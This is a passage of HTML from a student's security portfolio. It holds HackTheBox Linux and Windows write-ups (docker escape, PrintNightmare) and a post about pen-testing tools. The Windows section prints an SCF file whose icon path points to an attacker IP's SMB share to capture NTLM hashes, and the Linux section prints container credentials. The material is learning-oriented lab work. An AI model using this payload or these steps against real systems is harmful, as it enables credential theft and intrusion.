          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
